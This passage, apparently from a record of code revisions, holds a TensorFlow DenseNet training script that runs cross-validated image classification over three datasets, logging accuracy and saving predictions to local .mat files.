extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(\n cross_entropy)\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(\n y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax\n (y_, 1))\n wrong_prediction_printop = tf.Print(wrong_prediction, [\n wrong_prediction])\n predicted_labels = tf.argmax(y_conv, 1)\n predicted_labels_printop = tf.Print(predicted_labels, [\n predicted_labels])\n index = 0\n index_end = index + batch_size\n remaining = 0\n start_time = time.time()\n costs = []\n accuracy_list = []\n list_of_predicted_list = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))\n for i in range(iteration):\n if index_end > total_trainImages:\n remaining = total_trainImages - (index_end - batch_size)\n images = Train_Images[index_end - batch_size:\n total_trainImages, :]\n labels = Train_Labels[index_end - batch_size:\n total_trainImages, :]\n index = 0\n index_end = index + batch_size - remaining\n images = np.vstack((images, Train_Images[index:\n index_end, :]))\n labels = np.vstack((labels, Train_Labels[index:\n index_end, :]))\n batch = images, labels\n index = index_end\n index_end = index + batch_size\n else:\n batch = Train_Images[index:index_end, :], Train_Labels[\n index:index_end, :]\n index = index + batch_size\n index_end = index_end + batch_size\n if i in list_to_display:\n elapsed_time = time.time() - start_time\n print('Elapsed Time Before for loop: %f secs' %\n elapsed_time)\n Accuracy = 0\n itrt_index = i\n print('debug: %d & %d' % (iteration, i))\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(\n 1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(\n 1, number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted, prediction_prob = sess.run([\n wrong_prediction_printop,\n predicted_labels_printop,\n prediction_prob_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess\n .run([b1_conv_printop, b2_conv_printop,\n b3_conv_printop, t1_conv_printop,\n t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False}))\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list_1 = wrong\n predicted_list_1 = predicted\n prediction_prob_1 = prediction_prob\n else:\n wrong_list_1 = 
np.append(wrong_list_1, wrong,\n axis=0)\n predicted_list_1 = np.append(predicted_list_1,\n predicted, axis=0)\n prediction_prob_1 = np.append(prediction_prob_1,\n prediction_prob)\n Accuracy = Accuracy / num_test\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list_1)\n print('Average test accuracy: %g' % Accuracy)\n epoch_around = math.ceil(itrt_index * batch_size /\n total_trainImages)\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str\n (epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list':\n wrong_list_1, 'predicted_list': predicted_list_1,\n 'Target_labels': Target_labels, 'prediction_prob':\n prediction_prob, 'b1_list': b1_list, 'b2_list':\n b2_list, 'b3_list': b3_list, 't1_list': t1_list,\n 't2_list': t2_list, 't3_list': t3_list, 't1_b_list':\n t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':\n t3_b_list})\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'\n % (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = itrt_index * batch_size / total_trainImages\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 1.0, training: False})\n print('step %d, training accuracy %g' % (i, train_accuracy)\n )\n _, loss = sess.run([train_step, cross_entropy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: dropout_prob,\n training: True})\n iteration_cost = 0\n num_minibatches = int(total_trainImages / batch_size)\n iteration_cost += loss / num_minibatches\n costs.append(iteration_cost)\n if i % 100 == 0:\n print('Loss: ', loss)\n Accuracy = 0\n training_time = time.time() - start_time\n print('Training Time: %f secs' % training_time)\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(1,\n number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,\n keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted = sess.run([wrong_prediction_printop,\n predicted_labels_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([\n b1_conv_printop, b2_conv_printop, b3_conv_printop,\n t1_conv_printop, t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n 
b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list = wrong\n predicted_list = predicted\n else:\n wrong_list = np.append(wrong_list, wrong, axis=0)\n predicted_list = np.append(predicted_list, predicted,\n axis=0)\n Accuracy = Accuracy / num_test\n print('Average test accuracy: %g' % Accuracy)\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list)\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %\n (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = math.ceil(iteration * batch_size / total_trainImages\n )\n if epoch_around == 51:\n epoch_around = 50\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str(\n epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list': wrong_list,\n 'predicted_list': predicted_list, 'Target_labels':\n Target_labels, 'accuracy_list': accuracy_list,\n 'list_of_predicted_list': list_of_predicted_list, 'costs':\n costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':\n b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':\n t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,\n 't3_b_list': t3_b_list})\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\nmodel = MyModel()\ndensenet('1', 'org', 1, model)\ndensenet('1', 'org', 2, model)\ndensenet('1', 'org', 3, model)\ndensenet('1', 'org', 4, model)\ndensenet('1', 'org', 5, model)\ndensenet('1', 'aug', 1, model)\ndensenet('1', 'aug', 2, model)\ndensenet('1', 'aug', 3, model)\ndensenet('1', 'aug', 4, model)\ndensenet('1', 'aug', 5, model)\ndensenet('2', 'org', 1, model)\ndensenet('2', 'org', 2, model)\ndensenet('2', 'org', 3, model)\ndensenet('2', 'org', 4, model)\ndensenet('2', 'org', 5, model)\ndensenet('2', 'aug', 1, model)\ndensenet('2', 'aug', 2, model)\ndensenet('2', 'aug', 3, model)\ndensenet('2', 'aug', 4, model)\ndensenet('2', 'aug', 5, model)\ndensenet('3', 'org', 1, model)\ndensenet('3', 'org', 2, model)\ndensenet('3', 'org', 3, model)\ndensenet('3', 'org', 4, model)\ndensenet('3', 'org', 5, model)\ndensenet('3', 'aug', 1, model)\ndensenet('3', 'aug', 2, model)\ndensenet('3', 'aug', 3, model)\ndensenet('3', 'aug', 4, model)\ndensenet('3', 'aug', 5, model)\n",
"step-5": "def densenet(D,DT,F,model):\r\n import scipy.io as sio\r\n import time\r\n import os\r\n import math\r\n import numpy as np\r\n import matplotlib.pyplot as plt\r\n\r\n\r\n Dataset = D\r\n if DT == 'org':\r\n data_type = 'original'\r\n else:\r\n data_type = 'augmented'\r\n\r\n fs = model.fs\r\n fm1 = model.fm1\r\n batch_size = model.batch_size[0] \r\n learn_rate = model.learn_rate\r\n num_layers = model.num_layers\r\n k_fm = model.k_fm\r\n bottleneck = model.bottleneck\r\n dropout_prob = model.dropout_prob\r\n num_of_test = model.num_of_test\r\n\r\n ###############\r\n # load training / testing set from CrossVal folder,\r\n # names for training set, 'D1_1st_fold_train.mat', 'Augmented_D1_1st_fold_train.mat'\r\n # name for testing set, 'D1_1st_fold_test.mat'\r\n ###############\r\n if F == 1:\r\n file_name = '1st_fold'\r\n elif F == 2:\r\n file_name = '2nd_fold'\r\n elif F == 3:\r\n file_name = '3rd_fold'\r\n elif F == 4:\r\n file_name = '4th_fold'\r\n elif F == 5:\r\n file_name = '5th_fold'\r\n path = os.path.join('CrossVal', 'D'+Dataset)\r\n print(\"path \" ,path)\r\n if data_type == 'original':\r\n Train =sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_train.mat'))\r\n else:\r\n Train =sio.loadmat(os.path.join(path, 'Augmented_D'+Dataset+'_'+file_name+'_train.mat'))\r\n Test = sio.loadmat(os.path.join(path, 'D'+Dataset+'_'+file_name+'_test.mat'))\r\n\r\n if Dataset == '1':\r\n number_of_classes = 24\r\n num_of_ep = 50\r\n num_of_test = 20\r\n if data_type == 'augmented':\r\n train_imgs = 526190\r\n else:\r\n train_imgs = 52619\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n elif Dataset == '2':\r\n number_of_classes = 36\r\n num_of_ep = 200\r\n if data_type == 'augmented':\r\n train_imgs = 20120\r\n else:\r\n train_imgs = 2012\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n else:\r\n number_of_classes = 10\r\n num_of_ep = 200\r\n if data_type == 'augmented':\r\n train_imgs = 16000\r\n else:\r\n train_imgs = 1600\r\n iteration = math.ceil((num_of_ep * train_imgs) / batch_size)\r\n\r\n iteration_to_display = int(iteration / num_of_test) \r\n list_to_display = []\r\n for i in range(num_of_test):\r\n if i !=num_of_test:\r\n list_to_display.append(int(iteration_to_display*(i+1)))\r\n del i\r\n\r\n\r\n total_fm_Block_1 = fm1+(num_layers*k_fm)\r\n total_fm_Block_2 = total_fm_Block_1+(num_layers*k_fm)\r\n total_fm_Block_3 = total_fm_Block_2+(num_layers*k_fm)\r\n fc_nodes = [total_fm_Block_3 ]\r\n\r\n\r\n Train_Images = Train['trainImages']\r\n Train_Labels = Train['trainLabels2']\r\n total_trainImages = len(Train_Images[0,2])\r\n print(total_trainImages)\r\n Train_Images = Train_Images.reshape(784,total_trainImages).transpose().astype('float32')\r\n Train_Labels = Train_Labels.transpose().astype('float64')\r\n\r\n\r\n Test_Images = Test['testImages']\r\n Test_Labels = Test['testLabels2']\r\n total_testImages = len(Test_Images[0,2])\r\n Test_Images = Test_Images.reshape(784,total_testImages).transpose().astype('float32')\r\n Test_Labels = Test_Labels.transpose().astype('float64')\r\n Target_labels = np.argmax(Test_Labels,axis=1)\r\n\r\n del Test\r\n del Train\r\n\r\n import tensorflow as tf\r\n tf.reset_default_graph()\r\n g = tf.Graph()\r\n with g.as_default():\r\n tf.set_random_seed(1)\r\n\r\n def weight_variable(shape,n):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial,name=n)\r\n\r\n def bias_variable(shape,n):\r\n initial = tf.constant(0.1, shape=shape)\r\n return 
tf.Variable(initial,name=n)\r\n\r\n def avg_pool(input, s):\r\n return tf.nn.avg_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')\r\n\r\n def max_pool(input, s):\r\n return tf.nn.max_pool(input, [ 1, s, s, 1 ], [1, s, s, 1 ], 'SAME')\r\n\r\n def conv2d_1(input, in_features, out_features, kernel_size, name=\"W\", with_bias=False):\r\n W = weight_variable([ kernel_size, kernel_size, in_features, out_features], name)\r\n conv = tf.nn.conv2d(input, W, [ 1, 1, 1, 1 ], padding='SAME')\r\n if with_bias:\r\n return conv + bias_variable([ out_features ])\r\n return conv\r\n\r\n def batch_activ_conv(current, in_features, out_features, kernel_size, is_training, keep_prob, idx, scope='conv_block'):\r\n with tf.variable_scope(scope):\r\n current = tf.layers.batch_normalization(current, scale=True, training=is_training)\r\n current = tf.nn.relu(current)\r\n current = conv2d_1(current, in_features, out_features, kernel_size, name=\"W\"+str(idx))\r\n current = tf.nn.dropout(current, keep_prob)\r\n return current\r\n\r\n def block(input, layers, in_features, growth, is_training, keep_prob, name=\"Block_\"):\r\n with tf.name_scope(name):\r\n with tf.variable_scope(name):\r\n current = input\r\n features = in_features\r\n for idx in range(layers):\r\n tmp = batch_activ_conv(current, features, growth, fs, is_training, keep_prob, idx+1, scope='conv_block_'+str(idx+1))\r\n current = tf.concat((current, tmp), axis=3)\r\n features += growth\r\n return current, features\r\n\r\n\r\n x = tf.placeholder(tf.float32, shape=[None, 784])\r\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\r\n x_image = tf.reshape(x, [-1, 28, 28, 1])\r\n keep_prob = tf.placeholder(tf.float32)\r\n training = tf.placeholder(tf.bool)\r\n\r\n\r\n current = conv2d_1(x_image, 1, fm1, fs, name=\"W1\", with_bias=False)\r\n\r\n current, features = block(current, num_layers, fm1, k_fm, training, keep_prob, name=\"Block_1\")\r\n b1_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_1')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_1')\r\n t1_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_1_1')\r\n t1_conv_printop = tf.Print(current, [current])\r\n current = max_pool(current, 2)\r\n #current = avg_pool(current, 2)\r\n current, features = block(current, num_layers, features, k_fm, training, keep_prob, name=\"Block_2\")\r\n b2_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr_2\"):\r\n #current = batch_activ_conv(current, features, features, 1, training, keep_prob, 1, scope='Transition_layer_2')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_2')\r\n t2_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_2_1')\r\n t2_conv_printop = tf.Print(current, [current])\r\n current = max_pool(current, 2)\r\n #current = avg_pool(current, 2)\r\n current, features = block(current, num_layers, features, k_fm, training, keep_prob, name=\"Block_3\")\r\n b3_conv_printop = tf.Print(current, [current])\r\n with tf.name_scope(\"transition_lyr_3\"):\r\n #current = batch_activ_conv(current, features, features, 
1, training, keep_prob, 1, scope='Transition_layer_3')\r\n current = batch_activ_conv(current, features, bottleneck*k_fm, 1, training, keep_prob, 1, scope='Transition_layer_3')\r\n t3_b_conv_printop = tf.Print(current, [current])\r\n current = batch_activ_conv(current, bottleneck*k_fm, features, fs, training, keep_prob, 1, scope='Transition_layer_3_1')\r\n t3_conv_printop = tf.Print(current, [current])\r\n current = avg_pool(current, 7)\r\n current = tf.reshape(current, [tf.shape(current)[0], -1])\r\n\r\n with tf.name_scope(\"Dense_Last_lyr\"):\r\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes],\"w_fc3\")\r\n b_fc3 = bias_variable([number_of_classes],\"b_fc3\")\r\n y_conv = tf.matmul(current, W_fc3) + b_fc3\r\n prediction_prob = tf.nn.softmax(y_conv)\r\n prediction_prob_printop = tf.Print(prediction_prob, [prediction_prob])\r\n\r\n with tf.name_scope(\"Xent\"):\r\n cross_entropy = tf.reduce_mean(\r\n tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\r\n\r\n with tf.name_scope(\"train\"):\r\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(extra_update_ops):\r\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(cross_entropy)\r\n\r\n with tf.name_scope(\"accuracy\"):\r\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\r\n wrong_prediction_printop = tf.Print(wrong_prediction, [wrong_prediction])\r\n predicted_labels = tf.argmax(y_conv, 1)\r\n predicted_labels_printop = tf.Print(predicted_labels, [predicted_labels])\r\n\r\n index = 0\r\n index_end = index + batch_size\r\n remaining = 0\r\n start_time = time.time()\r\n costs = []\r\n accuracy_list = []\r\n list_of_predicted_list = []\r\n\r\n with tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer(),tf.set_random_seed(0))\r\n for i in range(iteration):\r\n if index_end > total_trainImages:\r\n remaining = total_trainImages - (index_end-batch_size) \r\n images = Train_Images[(index_end-batch_size):total_trainImages, :]\r\n labels = Train_Labels[(index_end-batch_size):total_trainImages, :]\r\n index = 0\r\n index_end = index + batch_size - remaining\r\n images = np.vstack((images, Train_Images[index:index_end, :]))\r\n labels = np.vstack((labels, Train_Labels[index:index_end, :]))\r\n batch = (images, labels)\r\n index = index_end\r\n index_end = index + batch_size\r\n else:\r\n batch = (Train_Images[index:index_end, :], Train_Labels[index:index_end, :])\r\n index = index + batch_size \r\n index_end = index_end + batch_size\r\n\r\n if i in list_to_display:\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time Before for loop: %f secs' % elapsed_time)\r\n Accuracy = 0\r\n itrt_index = i\r\n print('debug: %d & %d' % (iteration,i))\r\n\r\n if Dataset == '1':\r\n if file_name == '5th_fold':\r\n num_test = 13154\r\n else:\r\n num_test = 13155\r\n elif Dataset == '2':\r\n num_test = 503\r\n elif Dataset == '3':\r\n num_test = 400\r\n print(num_test)\r\n\r\n for img_index in range(num_test):\r\n t_image = np.array(Test_Images[img_index,:]).reshape(1,784)\r\n t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)\r\n test_acc = accuracy.eval(feed_dict={\r\n x: t_image, y_: t_label,\r\n keep_prob: 1.0, training:False})\r\n Accuracy += test_acc\r\n wrong, predicted, prediction_prob = sess.run([wrong_prediction_printop, \r\n 
predicted_labels_printop,prediction_prob_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index <= 3:\r\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,\r\n t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index == 0:\r\n b1_list = b1\r\n b2_list = b2\r\n b3_list = b3\r\n t1_list = t1\r\n t2_list = t2\r\n t3_list = t3\r\n t1_b_list = t1_b\r\n t2_b_list = t2_b\r\n t3_b_list = t3_b\r\n else:\r\n b1_list = np.append(b1_list,b1,axis=0)\r\n b2_list = np.append(b2_list,b2,axis=0)\r\n b3_list = np.append(b3_list,b3,axis=0)\r\n t1_list = np.append(t1_list,t1,axis=0)\r\n t2_list = np.append(t2_list,t2,axis=0)\r\n t3_list = np.append(t3_list,t3,axis=0)\r\n t1_b_list = np.append(t1_b_list,t1_b,axis=0)\r\n t2_b_list = np.append(t2_b_list,t2_b,axis=0)\r\n t3_b_list = np.append(t3_b_list,t3_b,axis=0) \r\n if img_index == 0 :\r\n wrong_list_1 = wrong\r\n predicted_list_1 = predicted\r\n prediction_prob_1 = prediction_prob\r\n else:\r\n wrong_list_1 = np.append(wrong_list_1,wrong,axis=0)\r\n predicted_list_1 = np.append(predicted_list_1,predicted,axis=0)\r\n prediction_prob_1 = np.append(prediction_prob_1, prediction_prob)\r\n\r\n\r\n Accuracy = Accuracy/num_test\r\n accuracy_list.append(Accuracy)\r\n list_of_predicted_list.append(predicted_list_1)\r\n print('Average test accuracy: %g' % Accuracy)\r\n epoch_around = math.ceil((itrt_index * batch_size) / total_trainImages)\r\n sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list_1, 'predicted_list': predicted_list_1, 'Target_labels':Target_labels, \r\n 'prediction_prob':prediction_prob, 'b1_list':b1_list, 'b2_list':b2_list, 'b3_list':b3_list, 't1_list':t1_list,\r\n 't2_list':t2_list, 't3_list':t3_list, 't1_b_list':t1_b_list, 't2_b_list':t2_b_list, 't3_b_list':t3_b_list})\r\n\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time: %f secs' % elapsed_time)\r\n print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages)) \r\n print('learning_rate : %g ' % learn_rate)\r\n print('1st conv FMaps : %d ' % fm1) \r\n print('number of layers in dense block : %d ' % num_layers) \r\n print('growth rate(k_fm) : %d ' % k_fm)\r\n print('filter size : %d ' % fs)\r\n print('bottleneck : %d' % bottleneck)\r\n print('dropout prob : %g ' % dropout_prob)\r\n print('data_type :', data_type)\r\n\r\n print('file_name :', file_name)\r\n\r\n print('FC nodes : %d' % fc_nodes[0])\r\n\r\n epoch_around = (itrt_index * batch_size) / total_trainImages\r\n print('Number of epochs : %f ' % epoch_around)\r\n\r\n # plot the cost\r\n plt.plot(np.squeeze(costs))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learn_rate))\r\n plt.show()\r\n\r\n if i % 100 == 0:\r\n train_accuracy = accuracy.eval(feed_dict={\r\n x: batch[0], y_: batch[1], \r\n keep_prob: 1.0, training:False})\r\n print('step %d, training accuracy %g' % (i, train_accuracy))\r\n _, loss = sess.run([train_step, cross_entropy], \r\n feed_dict={x: batch[0], y_: batch[1], \r\n keep_prob: dropout_prob, training:True})\r\n\r\n iteration_cost = 0 # Defines a cost related to an epoch\r\n num_minibatches = int(total_trainImages / batch_size) # number of minibatches of size 
minibatch_size in the train set \r\n iteration_cost += loss / num_minibatches\r\n costs.append(iteration_cost)\r\n if i % 100 == 0:\r\n print ('Loss: ',loss)\r\n\r\n\r\n Accuracy = 0\r\n training_time = time.time() - start_time\r\n print('Training Time: %f secs' % training_time)\r\n\r\n\r\n if Dataset == '1':\r\n if file_name == '5th_fold':\r\n num_test = 13154\r\n else:\r\n num_test = 13155\r\n elif Dataset == '2':\r\n num_test = 503\r\n elif Dataset == '3':\r\n num_test = 400\r\n print(num_test)\r\n\r\n for img_index in range(num_test):\r\n t_image = np.array(Test_Images[img_index,:]).reshape(1,784)\r\n t_label = np.array(Test_Labels[img_index,:]).reshape(1,number_of_classes)\r\n test_acc = accuracy.eval(feed_dict={\r\n x: t_image, y_: t_label,\r\n keep_prob: 1.0, training:False})\r\n Accuracy += test_acc\r\n wrong, predicted = sess.run([wrong_prediction_printop, predicted_labels_printop], feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index <= 3:\r\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([b1_conv_printop, b2_conv_printop, b3_conv_printop,\r\n t1_conv_printop,t2_conv_printop, t3_conv_printop, t1_b_conv_printop, t2_b_conv_printop, t3_b_conv_printop], \r\n feed_dict={\r\n x: t_image, y_: t_label, \r\n keep_prob: 1.0, training:False})\r\n if img_index == 0:\r\n b1_list = b1\r\n b2_list = b2\r\n b3_list = b3\r\n t1_list = t1\r\n t2_list = t2\r\n t3_list = t3\r\n t1_b_list = t1_b\r\n t2_b_list = t2_b\r\n t3_b_list = t3_b\r\n else:\r\n b1_list = np.append(b1_list,b1,axis=0)\r\n b2_list = np.append(b2_list,b2,axis=0)\r\n b3_list = np.append(b3_list,b3,axis=0)\r\n t1_list = np.append(t1_list,t1,axis=0)\r\n t2_list = np.append(t2_list,t2,axis=0)\r\n t3_list = np.append(t3_list,t3,axis=0)\r\n t1_b_list = np.append(t1_b_list,t1_b,axis=0)\r\n t2_b_list = np.append(t2_b_list,t2_b,axis=0)\r\n t3_b_list = np.append(t3_b_list,t3_b,axis=0) \r\n if img_index == 0 :\r\n wrong_list = wrong\r\n predicted_list = predicted\r\n else:\r\n wrong_list = np.append(wrong_list,wrong,axis=0)\r\n predicted_list = np.append(predicted_list,predicted,axis=0)\r\n\r\n\r\n Accuracy = Accuracy/num_test\r\n print('Average test accuracy: %g' % Accuracy)\r\n accuracy_list.append(Accuracy)\r\n list_of_predicted_list.append(predicted_list)\r\n\r\n elapsed_time = time.time() - start_time\r\n print('Elapsed Time: %f secs' % elapsed_time)\r\n print('Batch Size & Iteration & Total Train Imgs : %d & %d & %d' % (batch_size, itrt_index, total_trainImages)) \r\n print('learning_rate : %g ' % learn_rate)\r\n print('1st conv FMaps : %d ' % fm1) \r\n print('number of layers in dense block : %d ' % num_layers) \r\n print('growth rate(k_fm) : %d ' % k_fm)\r\n print('filter size : %d ' % fs)\r\n print('bottleneck : %d' % bottleneck)\r\n print('dropout prob : %g ' % dropout_prob)\r\n print('data_type :', data_type)\r\n\r\n print('file_name :', file_name)\r\n\r\n print('FC nodes : %d' % fc_nodes[0])\r\n\r\n epoch_around = math.ceil((iteration * batch_size) / total_trainImages)\r\n if epoch_around == 51:\r\n epoch_around = 50\r\n print('Number of epochs : %f ' % epoch_around)\r\n\r\n\r\n # plot the cost\r\n plt.plot(np.squeeze(costs))\r\n plt.ylabel('cost')\r\n plt.xlabel('iterations (per tens)')\r\n plt.title(\"Learning rate =\" + str(learn_rate))\r\n plt.show()\r\n\r\n sio.savemat('D'+Dataset+'_'+file_name+'_'+str(epoch_around)+'ep_'+data_type+'_predicted_labels_list.mat', {'wrong_list':wrong_list, 'predicted_list': predicted_list, 'Target_labels':Target_labels, 
